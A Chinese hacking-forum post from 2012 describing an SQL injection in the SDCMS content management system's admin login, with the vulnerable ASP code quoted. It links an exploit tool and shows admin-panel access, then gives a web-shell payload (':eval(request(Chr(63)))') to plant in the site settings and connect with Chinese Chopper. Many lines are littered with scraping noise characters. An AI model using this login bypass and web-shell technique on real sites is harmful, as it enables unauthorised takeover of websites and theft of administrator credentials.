作者:T00LS 鬼哥4 i* E$ v( p& w, N+ Z' i
漏洞文件:后台目录/index.asp
M$ J/ R- [+ b# v
* k* s; D( i7 ~, ASub Check
t1 ]% \1 @" g& }* N Dim username,password,code,getcode,Rs
( L; [* d( S g0 u IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub0 {' t6 _7 u& e5 P" B6 } n
username=FilterText(Trim(Request.Form("username")),1)' j( }6 ^5 p/ P# o( Z
password=FilterText(Trim(Request.Form("password")),1)
" L1 ~- C. l% C+ X5 Q E) d& [$ \ code=Trim(Request.Form("yzm"))
7 r, a+ c9 L6 r/ F/ \0 U* } getcode=Session("SDCMSCode")2 U. s6 G( q9 u: v6 d
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died7 `; ^- T* z! G! ^ n
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied$ ?& Q" X A" N& C# C7 d% u
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
* ]3 f) h1 y' @- \1 \ IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied2 p4 b _6 \! Z6 ]- j& f
IF username="" or password="" Then
: `+ o/ G& J2 a# f" P Echo "用户名或密码不能为空"ied4 p+ t6 i2 ]8 r; J9 F
Else
! w# \/ l$ z, a. Q Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")6 m; a, }/ l' ^4 Y
IF Rs.Eof Then
3 k( v/ S, a, \0 [% M) d3 \ AddLog username,GetIp,"登录失败",1
7 r' [1 @" o% a7 v/ k8 Q+ O1 o Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"; F t3 Y" q9 _+ ]: ]. x2 v
Else
- O5 q; b6 G1 e6 z& |! U* o0 g3 \ Add_Cookies "sdcms_id",Rs(0)+ k8 R: d# e/ m+ D2 I
Add_Cookies "sdcms_name",username
+ l- X+ r O& N! Q$ _ Add_Cookies "sdcms_pwd",Rs(2)2 K G4 H2 P9 e9 y+ n) c9 s. t
Add_Cookies "sdcms_admin",Rs(3)
1 H6 z6 O4 h1 g! k. `+ o Add_Cookies "sdcms_alllever",Rs(4)
7 a; p5 S, J8 o k% f7 L* V Add_Cookies "sdcms_infolever",Rs(5)
* ?3 @9 f! T1 e; {& o Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
0 d. T: A* _1 K1 C AddLog username,GetIp,"登录成功",1( o! ]% L+ m' Z( h" I+ z" k9 {0 u
'自动删除30天前的Log记录5 i. C7 P( b' M
IF Sdcms_DataType Then
2 @5 U. |+ Y8 }" C! N0 G( t; P Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30"): A( |0 w( E: c1 `
Else
- k3 A" w2 p1 U. g( A. r Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")5 [+ o7 E8 q9 ^5 Z$ t1 Y* k
End IF% b# T9 E- a; U3 p. @1 N
Go("sdcms_index.asp")/ v1 l4 d& b# V! d
End IF- b- W; y7 O. X
Rs.Close& [ u! T i r5 E( Z2 x0 v% J9 Q9 g
Set Rs=Nothing) q+ p1 ~, J! A h+ d8 \
End IF1 C9 j( b: G4 Y. _9 ^
End Sub: L5 g1 L/ J. f3 d+ K
. o3 O! k. i' F0 D: E) G' Z’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
9 o- j/ {. S6 u2 N& P: a1 V) X; I6 B' ~, D* V
Function FilterText(ByVal t0,ByVal t1)
4 `" w: O% w8 Z* J9 B6 D0 p, } IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
* [$ J# r5 a8 {5 L t0=Trim(t0)
7 T% I+ }! W3 X3 p Select Case t19 h8 `2 [5 h& O5 S8 I
Case "1"4 y" n; M2 Y9 k" M' C! D: Z
t0=Replace(t0,Chr(32),"")3 @/ e6 E2 V$ ]2 [1 J
t0=Replace(t0,Chr(13),"")9 o1 ^; {* l% m+ e Y
t0=Replace(t0,Chr(10)&Chr(10),""); M! s3 ^; G h5 X
t0=Replace(t0,Chr(10),"")
0 G% t+ x% N7 v9 e! a8 D$ O1 P Case "2"1 L8 B1 N2 Y* e8 Y9 e4 H8 M
t0=Replace(t0,Chr(8),"")'回格
* e9 T% ^3 J# I, |4 Q- ^: m t0=Replace(t0,Chr(9),"")'tab(水平制表符)4 O( \) q+ O8 D" M8 u
t0=Replace(t0,Chr(10),"")'换行) T I/ K) \ d( |
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
6 b V, U! r$ L# f* Z, Z& ]4 z8 p t0=Replace(t0,Chr(12),"")'换页
6 l U, F9 ~& }; n" k; P t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合7 ~- z5 D5 j- S0 C9 D
t0=Replace(t0,Chr(22),"")
8 E* V- k# ]8 g E* V t0=Replace(t0,Chr(32),"")'空格 SPACE4 \! ^) N) O$ E+ s, \: ?
t0=Replace(t0,Chr(33),"")'!
5 h# R) ^" X& ~# K3 t& C t0=Replace(t0,Chr(34),"")'"* P* T) X8 J% W# V, Z
t0=Replace(t0,Chr(35),"")'#
9 A5 ~5 F# E4 ` t0=Replace(t0,Chr(36),"")'$# |, W5 n9 }% L
t0=Replace(t0,Chr(37),"")'%) w( U$ h2 Q0 K; D+ @# {- B
t0=Replace(t0,Chr(38),"")'&9 ?7 m/ I/ Z; c" H N
t0=Replace(t0,Chr(39),"")''
& j# G# d% V0 g6 H4 G t0=Replace(t0,Chr(40),"")'(
4 r3 h- v6 B. r+ J* I, T2 n t0=Replace(t0,Chr(41),"")')
; C% P" Z0 {( C; r5 K t0=Replace(t0,Chr(42),"")'*
5 p7 t6 T" v3 p# F3 \ \ t0=Replace(t0,Chr(43),"")'+- d# x6 X/ }/ l5 ?
t0=Replace(t0,Chr(44),"")'," K! v$ g, l8 I9 C% I
t0=Replace(t0,Chr(45),"")'-
& c* T0 L0 }9 u8 X8 \ t0=Replace(t0,Chr(46),"")'.
. h( \. c# c ~5 y5 h& u- z$ I# h t0=Replace(t0,Chr(47),"")'/' p9 ^1 L$ y3 r$ T( t/ H# c& C
t0=Replace(t0,Chr(58),"")':0 ?% u- g o ?; r; U
t0=Replace(t0,Chr(59),"")';
: n& f" `/ w9 D& V/ k$ ] O t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>4 j2 ~9 f0 {+ ?% W: s1 Z
t0=Replace(t0,Chr(63),"")'?
" |6 t9 f: u8 o6 ]+ _) {+ k/ i) g t0=Replace(t0,Chr(64),"")'@
( _$ T; a5 ^) n1 L; Z/ C t0=Replace(t0,Chr(91),"")'\
+ j0 S5 e* \- e2 m' k/ | t0=Replace(t0,Chr(92),"")'\
0 N* s' p" A* X* B) u* u t0=Replace(t0,Chr(93),"")']+ c9 {' F2 L d" V+ w J! e
t0=Replace(t0,Chr(94),"")'^7 s$ w2 f" v1 ] R" L/ K+ L4 n
t0=Replace(t0,Chr(95),"")'_
1 a2 w# j/ q' w, S6 x5 S t0=Replace(t0,Chr(96),"")'`+ F1 y& Z1 f1 O5 _) r( P1 h A
t0=Replace(t0,Chr(123),"")'{
5 _2 I9 _9 B( [0 n t0=Replace(t0,Chr(124),"")'|
5 |( F; t; T2 K. R! A* s0 r t0=Replace(t0,Chr(125),"")'}5 X* O$ n7 V$ l2 O# y6 Y! d7 ^
t0=Replace(t0,Chr(126),"")'~& A" y* N& e% i3 F
Case Else
! Z/ v/ @6 W3 Q- D$ r t0=Replace(t0, "&", "&")
, C6 \% [; G Q9 E& x2 q0 {9 @9 J2 ` t0=Replace(t0, "'", "'")4 T7 P2 X, P1 A$ e3 C
t0=Replace(t0, """", """)+ m( F" q( e& ~. y( ^& E% H; U
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")& x z* v4 U& Q; J4 _* o* s, l
End Select
+ J7 f9 t h2 j% e. r IF Instr(Lcase(t0),"expression")>0 Then, _/ y: E! l9 Q* S2 l/ S. y
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)- M' n$ Z7 M) W/ R
End If1 N( H$ {- d% M+ m& W
FilterText=t0
. b! @6 e5 U. m, EEnd Function( s% C, f9 ^" `! a& \7 g8 n% P
6 K1 U8 D; S& H9 ~$ i/ s5 z
看到没。直接参数是1 只过滤+ G8 |* ? Q5 h
t0=Replace(t0,Chr(32)," "). c; F9 V/ B; m4 K+ ^2 ?: m; P6 L
t0=Replace(t0,Chr(13),"")$ I5 ~4 I& Z! `* O" H6 F
t0=Replace(t0,Chr(10)&Chr(10),"
4 a+ v: g4 c9 x9 G& p8 m# o")0 q! s2 \5 t7 p
t0=Replace(t0,Chr(10),"2 p8 r ]8 t: N* T8 h2 l
")
9 b/ l4 Y/ ?7 y; ?4 H b漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
$ f+ H, v8 ~- d, v( M) N+ @ a9 QEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP$ I+ E1 k2 d2 w1 G# y% }
% u2 N3 S% w. Q6 U! [0 k测试:
% j( q# M* T! v( z7 W' r+ x/ v, E
1 U5 i2 ^ I7 b' |
% m, m. r+ |3 t0 T; d9 U现在输入工具上验证码,然后点OK
# H/ J& k' p2 X) S6 j* Z. q& q$ {+ \- b
$ G) B6 {2 F! B7 ^8 W4 L- f
看到我们直接进入后台管理界面了,呵呵! X0 T4 ~7 l3 ?, S( a% r
1 |, ~$ B7 ~4 t
9 k4 Y3 y6 M8 S# w& i; [/ g
5 b5 K, `) U/ t这样直接进入后台了。。。。
. D# S7 ~! Y" ]$ w/ S! d/ U& K2 w# ^: \
3 H8 @& w1 ]2 i
4 ^* T: ~. @, W: M$ Q' aSDCMS提权:5 d4 q n5 h* B9 S7 T9 O
: ^+ D! N& }+ j6 `5 @3 O p方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?+ v+ Q/ j O/ e2 U5 r' f" M
: \% a& ]* M# ^0 R
r4 [# Y# w% F- u; P9 n8 `# T. p: r9 y% T. i2 Z
OK,现在用菜刀连接下!
0 C( H, M. n m6 \# ^
6 G! }$ ~5 n# x* ]
2 T. b+ {# u/ l$ r% k
6 d3 D3 }3 D3 y' C- I1 `7 u
3 Y0 |& X3 B8 Y. J' i. i
( ?5 ~' g& U2 ]6 |2 H$ M, | |
发表于 2012-11-9 20:57:02
收藏
支持
反对